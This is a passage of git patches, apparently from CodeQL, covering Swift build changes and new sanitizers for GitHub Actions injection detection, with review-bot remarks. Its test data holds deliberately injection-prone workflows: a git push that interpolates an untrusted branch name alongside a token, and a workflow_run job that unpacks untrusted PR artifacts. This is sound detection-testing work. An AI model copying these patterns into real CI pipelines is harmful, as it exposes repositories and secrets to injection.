@@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit 
[file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | From d3fb2543d2977c57ab6e4ab32279db6ce904ba26 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli
Date: Wed, 30 Oct 2024 12:26:34 +0100
Subject: [PATCH 0651/1267] Swift: try out new builds
---
 .gitattributes | 3 +-
 .github/workflows/swift.yml | 6 +
 MODULE.bazel | 19 +-
 misc/bazel/lfs.bzl | 6 +
 swift/BUILD.bazel | 2 +-
 swift/actions/build-and-test/action.yml | 2 +-
 swift/extractor/BUILD.bazel | 2 +-
 swift/extractor/infra/BUILD.bazel | 2 +-
 swift/extractor/main.cpp | 1 +
 swift/extractor/mangler/BUILD.bazel | 2 +-
 swift/extractor/remapping/BUILD.bazel | 2 +-
 swift/extractor/translators/BUILD.bazel | 2 +-
 swift/third_party/BUILD.bazel | 3 +
 .../BUILD.swift-llvm-support.bazel | 20 +-
 swift/third_party/load.bzl | 178 +++++++-----------
 swift/third_party/resource-dir/BUILD.bazel | 27 ---
 swift/third_party/resource-dir/README.md | 2 -
 swift/third_party/resources/BUILD.bazel | 21 +++
 .../{resource-dir => resources}/LICENSE.txt | 0
 swift/third_party/resources/README.md | 7 +
 .../resource-dir-linux.zip | 0
 .../resource-dir-macos.zip | 0
 .../{resource-dir => resources}/update.sh | 0
 .../swift-llvm-support/BUILD.bazel | 9 -
 24 files changed, 147 insertions(+), 169 deletions(-)
 delete mode 100644 swift/third_party/resource-dir/BUILD.bazel
 delete mode 100644 swift/third_party/resource-dir/README.md
 create mode 100644 swift/third_party/resources/BUILD.bazel
 rename swift/third_party/{resource-dir => resources}/LICENSE.txt (100%)
 create mode 100644 swift/third_party/resources/README.md
 rename swift/third_party/{resource-dir => resources}/resource-dir-linux.zip (100%)
 rename swift/third_party/{resource-dir => resources}/resource-dir-macos.zip (100%)
 rename swift/third_party/{resource-dir => resources}/update.sh (100%)
 delete mode 100644 swift/third_party/swift-llvm-support/BUILD.bazel
diff --git a/.gitattributes b/.gitattributes
index 215fe0b81e1..df5bed028be 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -86,4 +86,5 @@ /misc/ripunzip/ripunzip-* filter=lfs diff=lfs merge=lfs -text # swift prebuilt resources -/swift/third_party/resource-dir/*.zip filter=lfs diff=lfs merge=lfs -text +/swift/third_party/resources/*.zip filter=lfs diff=lfs merge=lfs -text +/swift/third_party/resources/*.tar.zst filter=lfs diff=lfs merge=lfs -text diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index ad7e8f52aa3..6056dc4363f 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -109,3 +109,9 @@ jobs: - uses: actions/checkout@v4 - uses: ./.github/actions/fetch-codeql - uses: ./swift/actions/database-upgrade-scripts + check-no-override: + if : ${{ github.event_name == 'pull_request' }} + runs-on: ubuntu-latest + steps: + - shell: bash + run: bazel test //swift/... --test_tag_filters=override --test_output=errors diff --git a/MODULE.bazel b/MODULE.bazel index 4a2219d43a5..b4f209dae7c 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -28,6 +28,7 @@ bazel_dep(name = "gazelle", version = "0.38.0") bazel_dep(name = "rules_dotnet", version = "0.15.1") bazel_dep(name = "googletest", version = "1.14.0.bcr.1") bazel_dep(name = "rules_rust", version = "0.50.0") +bazel_dep(name = "zstd", version = "1.5.5.bcr.1") bazel_dep(name = "buildifier_prebuilt", version = "6.4.0", dev_dependency = True) @@ -91,10 +92,10 @@ use_repo( swift_deps, "binlog", "picosha2", - "swift_prebuilt_darwin_x86_64", - "swift_prebuilt_linux", - "swift_toolchain_linux", - "swift_toolchain_macos", + "swift-prebuilt-linux", + "swift-prebuilt-macos", + "swift-resource-dir-linux", + "swift-resource-dir-macos", ) node = use_extension("@rules_nodejs//nodejs:extensions.bzl", "node") 
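Review bot: The added `check-no-override` job has no checkout step before `bazel test //swift/... --test_tag_filters=override`, so the command would run in an empty workspace and cannot evaluate the `test-no-override` target. Add `- uses: actions/checkout@v4` as the first entry under `steps:`, as the job in the context lines above it does. This matters for supply-chain hygiene because the build-and-test action in this same patch now passes `--test_tag_filters=-override`, which leaves this job as the only visible gate that keeps the `dsp-testing` staging artifacts referenced in `load.bzl` from reaching main. Whether the job is configured as a required status check is not visible here and is worth confirming.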
@@ -186,16 +187,6 @@ lfs_files( executable = True, ) -lfs_files( - name = "swift-resource-dir-linux", - srcs = ["//swift/third_party/resource-dir:resource-dir-linux.zip"], -) - -lfs_files( - name = "swift-resource-dir-macos", - srcs = ["//swift/third_party/resource-dir:resource-dir-macos.zip"], -) - register_toolchains( "@nodejs_toolchains//:all", ) diff --git a/misc/bazel/lfs.bzl b/misc/bazel/lfs.bzl index a068d76b2ea..5dcba3894a3 100644 --- a/misc/bazel/lfs.bzl +++ b/misc/bazel/lfs.bzl @@ -77,6 +77,12 @@ def _download_lfs(repository_ctx): ) repository_ctx.file("BUILD.bazel", build) + # this is for drop-in compatibility with `http_file` + repository_ctx.file( + "file/BUILD.bazel", + 'alias(name = "file", actual = "//:%s", visibility = ["//visibility:public"])\n' % name, + ) + lfs_archive = repository_rule( doc = "Export the contents from an on-demand LFS archive. The corresponding path should be added to be ignored " + "in `.lfsconfig`.", diff --git a/swift/BUILD.bazel b/swift/BUILD.bazel index 444730950be..52509a0963c 100644 --- a/swift/BUILD.bazel +++ b/swift/BUILD.bazel @@ -81,7 +81,7 @@ codeql_pack( zips = select({ "@platforms//os:windows": {}, "//conditions:default": { - "//swift/third_party/resource-dir": "resource-dir/{CODEQL_PLATFORM}", + "//swift/third_party/resources:dir": "resource-dir/{CODEQL_PLATFORM}", }, }), ) diff --git a/swift/actions/build-and-test/action.yml b/swift/actions/build-and-test/action.yml index 2522f545c05..9cbae47bacc 100644 --- a/swift/actions/build-and-test/action.yml +++ b/swift/actions/build-and-test/action.yml @@ -58,7 +58,7 @@ runs: if: ${{ github.event_name == 'pull_request' }} shell: bash run: | - bazel test //swift/... + bazel test //swift/... --test_tag_filters=-override --test_output=errors - name: Evict bazel cache if: ${{ github.event_name != 'pull_request' }} shell: bash diff --git a/swift/extractor/BUILD.bazel b/swift/extractor/BUILD.bazel index 8290aec4121..962392a6c57 100644 --- a/swift/extractor/BUILD.bazel 
+++ b/swift/extractor/BUILD.bazel @@ -18,7 +18,7 @@ swift_cc_binary( "//swift/extractor/invocation", "//swift/extractor/remapping", "//swift/extractor/translators", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", "@absl//absl/strings", ], ) diff --git a/swift/extractor/infra/BUILD.bazel b/swift/extractor/infra/BUILD.bazel index 6a624844c76..7f6af092ef4 100644 --- a/swift/extractor/infra/BUILD.bazel +++ b/swift/extractor/infra/BUILD.bazel @@ -10,7 +10,7 @@ swift_cc_library( "//swift/extractor/infra/file", "//swift/extractor/trap", "//swift/logging", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", "@picosha2", ], ) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index ad2939bb5e2..045d7fdb968 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -20,6 +20,7 @@ #include "swift/extractor/trap/TrapDomain.h" #include "swift/extractor/infra/file/Path.h" #include "swift/logging/SwiftAssert.h" +#include "swift/Threading/Errors.h" using namespace std::string_literals; using namespace codeql::main_logger; diff --git a/swift/extractor/mangler/BUILD.bazel b/swift/extractor/mangler/BUILD.bazel index 71c9cbf900e..658e750bdcc 100644 --- a/swift/extractor/mangler/BUILD.bazel +++ b/swift/extractor/mangler/BUILD.bazel @@ -8,6 +8,6 @@ swift_cc_library( deps = [ "//swift/extractor/infra", "//swift/extractor/trap", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", ], ) diff --git a/swift/extractor/remapping/BUILD.bazel b/swift/extractor/remapping/BUILD.bazel index da5eee55dc1..44a7d7445bb 100644 --- a/swift/extractor/remapping/BUILD.bazel +++ b/swift/extractor/remapping/BUILD.bazel @@ -8,7 +8,7 @@ swift_cc_library( deps = [ "//swift/extractor/config", "//swift/extractor/infra/file", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", "@picosha2", ], ) 
diff --git a/swift/extractor/translators/BUILD.bazel b/swift/extractor/translators/BUILD.bazel index 0bfc59db970..7b3356f6960 100644 --- a/swift/extractor/translators/BUILD.bazel +++ b/swift/extractor/translators/BUILD.bazel @@ -8,6 +8,6 @@ swift_cc_library( deps = [ "//swift/extractor/infra", "//swift/extractor/mangler", - "//swift/third_party/swift-llvm-support", + "//swift/third_party/resources:prebuilt", ], ) diff --git a/swift/third_party/BUILD.bazel b/swift/third_party/BUILD.bazel index e69de29bb2d..b9982c37e8d 100644 --- a/swift/third_party/BUILD.bazel +++ b/swift/third_party/BUILD.bazel @@ -0,0 +1,3 @@ +load(":load.bzl", "test_no_override") + +test_no_override() diff --git a/swift/third_party/BUILD.swift-llvm-support.bazel b/swift/third_party/BUILD.swift-llvm-support.bazel index af98184b673..231500b35ab 100644 --- a/swift/third_party/BUILD.swift-llvm-support.bazel +++ b/swift/third_party/BUILD.swift-llvm-support.bazel @@ -1,12 +1,9 @@ cc_library( - name = "swift-llvm-support", + name = "swift-llvm-support-static", srcs = glob( [ "*.a", - "*.so", - "*.dylib", ], - allow_empty = True, # Either *.so or *.dylib will be empty ), hdrs = glob([ "include/**/*", @@ -16,6 +13,20 @@ cc_library( "include", "stdlib/public/SwiftShims", ], + deps = [ + "@zstd", + ], +) + +cc_library( + name = "swift-llvm-support", + srcs = glob( + [ + "*.so", + "*.dylib", + ], + allow_empty = True, # Either *.so or *.dylib will be empty + ), linkopts = [ "-lm", "-lz", @@ -32,4 +43,5 @@ cc_library( "//conditions:default": [], }), visibility = ["//visibility:public"], + deps = [":swift-llvm-support-static"], ) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index a893b59d2dc..75eb585b6cc 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl 
@@ -1,101 +1,55 @@ -load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") +load("@bazel_skylib//rules:write_file.bzl", "write_file") +load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_file") load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") +load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") -_swift_prebuilt_version = "swift-6.0.1-RELEASE.330" -_swift_sha_map = { - "Linux-X64": "3da9b257b08da3bed023656c3bea2e1d0e6504b1592f593a077023c59e5339fc", - "macOS-X64": "66641b3b285e593342b88d48defa6668b15a85603acfe5aba5b62b9ed9123465", +# these are used to test new artifacts. They must not be merged to main as different from None +_override_resource_dir = { + "macOS": "ad533e614c3565db17186fa93684bd404d1bd66120b563957a44afc997a82b5e", + "Linux": "d6f1abbe9c0662ec2418b9a8c0136b1d8399601f556631a7b0910115cef3a38a", +} +_override_prebuilt = { + "macOS": "8f3c775aa7a62e97046f4dcfbc5b51c317712250396c7a07f7d0f4bd666a59d4", + "Linux": "5658fe92fe60b01b897757495d455c9fe435037a0973cb5b642e04be00a77ed3", } -_swift_arch_map = { - "Linux-X64": "linux", - "macOS-X64": "darwin_x86_64", -} +_staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" -_swift_version = _swift_prebuilt_version.rpartition(".")[0] - -_toolchain_info = { - "linux": struct( - platform = "ubuntu2004", - suffix = "ubuntu20.04", - extension = "tar.gz", - sha = "935d0b68757d9b1aceb6410fe0b126a28a07e362553ebba0c4bcd1c9a55d0bc5", - ), - "macos": struct( - platform = "xcode", - suffix = "osx", - extension = "pkg", - sha = "ef9bb6b38711324e1b1c89de44a27d9519d0711924c57f4df541734b04aaf6cc", - ), -} - -def _get_toolchain_url(info): - return "https://download.swift.org/%s/%s/%s/%s-%s.%s" % ( - _swift_version.lower(), - info.platform, - _swift_version, - _swift_version, - info.suffix, - info.extension, - ) - -def _toolchains(): - rules = { - "tar.gz": http_archive, - "pkg": _pkg_archive, - } - for arch, info in 
_toolchain_info.items(): - rule = rules[info.extension] - rule( - name = "swift_toolchain_%s" % arch, - url = _get_toolchain_url(info), - sha256 = info.sha, - build_file = _build % "swift-toolchain-%s" % arch, - strip_prefix = "%s-%s" % (_swift_version, info.suffix), +def _load_resource_dir(plat): + name = "swift-resource-dir-%s" % plat.lower() + file = "resource-dir-%s.zip" % plat + override = _override_resource_dir[plat] + if override: + http_file( + name = name, + url = _staging_url.format(file = file), + sha256 = override, + downloaded_file_path = file, + ) + else: + lfs_files( + name = name, + srcs = ["//swift/third_party/resources:%s" % file], ) -def _run(repository_ctx, message, cmd, working_directory = "."): - repository_ctx.report_progress(message) - res = repository_ctx.execute( - ["bash", "-c", cmd], - working_directory = working_directory, - ) - if res.return_code != 0: - fail(message) - -def _pkg_archive_impl(repository_ctx): - archive = "file.pkg" - url = repository_ctx.attr.url - dir = "%s-package.pkg" % repository_ctx.attr.strip_prefix - repository_ctx.report_progress("downloading %s" % url) - res = repository_ctx.download( - url, - output = archive, - sha256 = repository_ctx.attr.sha256, - ) - if not repository_ctx.attr.sha256: - print("Rule '%s' indicated that a canonical reproducible form " % repository_ctx.name + - "can be obtained by modifying arguments sha256 = \"%s\"" % res.sha256) - _run(repository_ctx, "extracting %s" % dir, "xar -xf %s" % archive) - repository_ctx.delete(archive) - _run( - repository_ctx, - "extracting Payload from %s" % dir, - "cat %s/Payload | gunzip -dc | cpio -i" % dir, - ) - repository_ctx.delete(dir) - repository_ctx.symlink(repository_ctx.attr.build_file, "BUILD") - repository_ctx.file("WORKSPACE") - -_pkg_archive = repository_rule( - implementation = _pkg_archive_impl, - attrs = { - "url": attr.string(mandatory = True), - "sha256": attr.string(), - "strip_prefix": attr.string(), - "build_file": attr.label(mandatory 
= True), - }, -) +def _load_prebuilt(plat): + name = "swift-prebuilt-%s" % plat.lower() + file = "swift-prebuilt-%s.tar.zst" % plat + build = _build % "swift-llvm-support" + override = _override_prebuilt[plat] + if override: + http_archive( + name = name, + url = _staging_url.format(file = file), + sha256 = override, + build_file = build, + ) + else: + lfs_archive( + name = name, + src = "//swift/third_party/resources:%s" % file, + build_file = build, + ) def _github_archive(*, name, repository, commit, build_file = None, sha256 = None): github_name = repository[repository.index("/") + 1:] @@ -111,20 +65,9 @@ def _github_archive(*, name, repository, commit, build_file = None, sha256 = Non _build = "//swift/third_party:BUILD.%s.bazel" def load_dependencies(module_ctx): - for repo_arch, arch in _swift_arch_map.items(): - sha256 = _swift_sha_map[repo_arch] - - http_archive( - name = "swift_prebuilt_%s" % arch, - url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/%s/swift-prebuilt-%s.zip" % ( - _swift_prebuilt_version, - repo_arch, - ), - build_file = _build % "swift-llvm-support", - sha256 = sha256, - ) - - _toolchains() + for plat in ("macOS", "Linux"): + _load_prebuilt(plat) + _load_resource_dir(plat) _github_archive( name = "picosha2", 
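Review bot: In `_load_resource_dir` and `_load_prebuilt` the LFS fallback builds its label from `file`, which keeps the capitalised platform (`resource-dir-macOS.zip`, `resource-dir-Linux.zip`), while the archives this patch renames into `swift/third_party/resources/` are lower-case (`resource-dir-macos.zip`, `resource-dir-linux.zip`). Only the staging branch is exercised while the override hashes are set, so the mismatch would surface once they are cleared for main; it looks like the fallback needs `srcs = ["//swift/third_party/resources:%s" % file.lower()]` and `src = "//swift/third_party/resources:%s" % file.lower()`. The comment above the two dicts could also state plainly that every value must be `None` on main, since `if override:` is what selects the in-repo artifact over the staging download.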
@@ -148,3 +91,28 @@ def load_dependencies(module_ctx): ) swift_deps = module_extension(load_dependencies) + +def test_no_override(): + test_body = ["#!/bin/bash", "", "RET=0"] + for name, definition in ( + ("_override_prebuilt", _override_prebuilt), + ("_override_resource_dir", _override_resource_dir), + ): + for plat in ("macOS", "Linux"): + if definition[plat]: + test_body += [ + 'echo %s[\\"%s\\"] overridden in swift/third/party/load.bzl' % (name, plat), + "RET=1", + ] + test_body += ["", "exit $RET"] + write_file( + name = "test-no-override-gen", + out = "test-no-override.sh", + content = test_body, + is_executable = True, + ) + native.sh_test( + name = "test-no-override", + srcs = [":test-no-override-gen"], + tags = ["override"], + ) diff --git a/swift/third_party/resource-dir/BUILD.bazel b/swift/third_party/resource-dir/BUILD.bazel deleted file mode 100644 index 9cea2efd029..00000000000 --- a/swift/third_party/resource-dir/BUILD.bazel +++ /dev/null @@ -1,27 +0,0 @@ -alias( - name = "resource-dir", - actual = select({"@platforms//os:" + os: "@swift-resource-dir-" + os for os in ("linux", "macos")}), - target_compatible_with = select({ - "@platforms//os:windows": ["@platforms//:incompatible"], - "//conditions:default": [], - }), - visibility = ["//visibility:public"], -) - -[ - sh_binary( - name = "update-" + os, - srcs = ["update.sh"], - args = [ - "$(rlocationpath @swift_toolchain_%s)" % os, - "$(rlocationpath resource-dir-%s.zip)" % os, - ], - data = [ - "resource-dir-%s.zip" % os, - "@swift_toolchain_" + os, - ], - target_compatible_with = ["@platforms//os:" + os], - deps = ["//misc/bazel:sh_runfiles"], - ) - for os in ("linux", "macos") -] diff --git a/swift/third_party/resource-dir/README.md b/swift/third_party/resource-dir/README.md deleted file mode 100644 index 38873b4a54f..00000000000 --- a/swift/third_party/resource-dir/README.md +++ /dev/null 
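Review bot: The message emitted by `test_no_override` names `swift/third/party/load.bzl`, but the file is `swift/third_party/load.bzl`, so a failing gate points the reader at a path that does not exist. The echoed text is also unquoted in the generated script, which leaves the `[`…`]` part open to shell globbing; quoting the whole message avoids that, e.g. `"echo '%s[\"%s\"] overridden in swift/third_party/load.bzl'" % (name, plat),`. The same path is kept when PATCH 0654 rewrites this function.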
@@ -1,2 +0,0 @@ -These LFS files are redistributed parts of the [Swift toolchains](https://www.swift.org/download/). -A [copy](./LICENSE.txt) of the [swift](https://github.com/apple/swift) license is included. diff --git a/swift/third_party/resources/BUILD.bazel b/swift/third_party/resources/BUILD.bazel new file mode 100644 index 00000000000..3bf263911cd --- /dev/null +++ b/swift/third_party/resources/BUILD.bazel @@ -0,0 +1,21 @@ +_oses = ("linux", "macos") + +alias( + name = "dir", + actual = select({"@platforms//os:" + os: "@swift-resource-dir-%s//file" % os for os in _oses}), + target_compatible_with = select({ + "@platforms//os:windows": ["@platforms//:incompatible"], + "//conditions:default": [], + }), + visibility = ["//visibility:public"], +) + +alias( + name = "prebuilt", + actual = select({"@platforms//os:" + os: "@swift-prebuilt-%s//:swift-llvm-support" % os for os in _oses}), + target_compatible_with = select({ + "@platforms//os:windows": ["@platforms//:incompatible"], + "//conditions:default": [], + }), + visibility = ["//visibility:public"], +) diff --git a/swift/third_party/resource-dir/LICENSE.txt b/swift/third_party/resources/LICENSE.txt similarity index 100% rename from swift/third_party/resource-dir/LICENSE.txt rename to swift/third_party/resources/LICENSE.txt diff --git a/swift/third_party/resources/README.md b/swift/third_party/resources/README.md new file mode 100644 index 00000000000..99b48964e19 --- /dev/null +++ b/swift/third_party/resources/README.md @@ -0,0 +1,7 @@ +The `resource-dir-*.zip` LFS files are redistributed parts of the [Swift toolchains](https://www.swift.org/download/). + +The `swift-prebuilt-*.tar.zst` LFS files are precompiled binaries of the [swift code][swift]. + +A [copy](./LICENSE.txt) of the [swift][] license is included. + +[swift]: https://github.com/apple/swift 
diff --git a/swift/third_party/resource-dir/resource-dir-linux.zip b/swift/third_party/resources/resource-dir-linux.zip
similarity index 100%
rename from swift/third_party/resource-dir/resource-dir-linux.zip
rename to swift/third_party/resources/resource-dir-linux.zip
diff --git a/swift/third_party/resource-dir/resource-dir-macos.zip b/swift/third_party/resources/resource-dir-macos.zip
similarity index 100%
rename from swift/third_party/resource-dir/resource-dir-macos.zip
rename to swift/third_party/resources/resource-dir-macos.zip
diff --git a/swift/third_party/resource-dir/update.sh b/swift/third_party/resources/update.sh
similarity index 100%
rename from swift/third_party/resource-dir/update.sh
rename to swift/third_party/resources/update.sh
diff --git a/swift/third_party/swift-llvm-support/BUILD.bazel b/swift/third_party/swift-llvm-support/BUILD.bazel
deleted file mode 100644
index 4bc1fffba94..00000000000
--- a/swift/third_party/swift-llvm-support/BUILD.bazel
+++ /dev/null
@@ -1,9 +0,0 @@
-package(default_visibility = ["//swift:__subpackages__"])
-
-alias(
- name = "swift-llvm-support",
- actual = select({
- "@bazel_tools//src/conditions:linux": "@swift_prebuilt_linux//:swift-llvm-support",
- "@bazel_tools//src/conditions:darwin": "@swift_prebuilt_darwin_x86_64//:swift-llvm-support",
- }),
-)
From 263582c7969ede1c3d8a1022756434fe0d1054bd Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 30 Oct 2024 12:43:19 +0100
Subject: [PATCH 0652/1267] feat: Add sanitizers for bash test commands
---
 ql/lib/codeql/actions/Bash.qll | 23 ++++++-
 .../CWE-094/.github/workflows/test23.yml | 64 +++++++++++++++++++
 2 files changed, 86 insertions(+), 1 deletion(-)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml
diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll
index fda27732828..7f2d4aeef9c 100644
--- a/ql/lib/codeql/actions/Bash.qll
+++ b/ql/lib/codeql/actions/Bash.qll
@@ -691,11 +691,32 @@ module Bash { // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) script.getAnAssignment(var2, value2) and containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(expr, var2, _, _) + containsParameterExpansion(expr, var2, _, _) and + not varMatchesRegexTest(script, var2, alphaNumericRegex()) ) or // var reaches the file write directly // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) containsCmdSubstitution(expr, cmd) } + + /** + * Holds if there test command that checks a variable against a regex + * eg: `[[ $VAR =~ ^[a-zA-Z0-9_]+$ ]]` + */ + bindingset[var, regex] + predicate varMatchesRegexTest(BashShellScript script, string var, string regex) { + exists(string lhs, string rhs | + lhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and + containsParameterExpansion(lhs, var, _, _) and + rhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and + trimQuotes(rhs).regexpMatch(regex) + ) + } + + /** + * Holds if the given regex is used to match an alphanumeric string + * eg: `^[0-9a-zA-Z]{40}$`, `^[0-9]+$` or `^[a-zA-Z0-9_]+$` + */ + string alphaNumericRegex() { result = "^\\^\\[([09azAZ_-]+)\\](\\+|\\{\\d+\\})\\$$" } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml new file mode 100644 index 00000000000..184bcd96610 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml 
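Review bot: In `varMatchesRegexTest`, `lhs` and `rhs` are captured from two independent `script.getACommand()` calls, so the variable can come from one `[[ … =~ … ]]` test and the pattern from another; a script with a strict test on one variable and a loose test on `var` would then satisfy the predicate, and the new `not varMatchesRegexTest(script, var2, alphaNumericRegex())` conjunct would drop the finding. Bind the command once: `exists(string cmd, string lhs, string rhs | cmd = script.getACommand() and lhs = cmd.regexpCapture(…, 1) and rhs = cmd.regexpCapture(…, 2) and …)`. The predicate is also position-independent as written: it does not check that the test precedes the write or that the failing branch exits, which deserves a sentence in its QLDoc (whose first line should read "Holds if there is a test command …"). The predicate that gains the `not …` conjunct starts outside this hunk.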
@@ -0,0 +1,64 @@ +on: + workflow_run: + +jobs: + test: + runs-on: ubuntu-22.04 + if: > + (github.event.workflow_run.event == 'pull_request' || + github.event.workflow_run.event == 'pull_request_target') && + github.event.workflow_run.conclusion == 'success' + + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "doc-build-artifact" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', Buffer.from(download.data)); + + - run: | + mkdir build_dir + unzip doc-build-artifact.zip -d build_dir + + - name: Get commit_sha & pr_number + id: github-context + run: | + content_commit_sha=$(cat ./build_dir/commit_sha) + if [[ $content_commit_sha =~ ^[0-9a-zA-Z]{40}$ ]]; then + echo "commit_sha=$content_commit_sha" >> $GITHUB_OUTPUT + rm -rf ./build_dir/commit_sha + else + echo "Encountered an invalid commit_sha" + exit 1 + fi + + content_pr_number=$(cat ./build_dir/pr_number) + if [[ $content_pr_number =~ ^[0-9]+$ ]]; then + echo "pr_number=$content_pr_number" >> $GITHUB_OUTPUT + rm -rf ./build_dir/pr_number + else + echo "Encountered an invalid pr_number" + exit 1 + fi + + - run: | + echo "hub_docs_url=pr_${{ steps.github-context.outputs.pr_number }}" >> 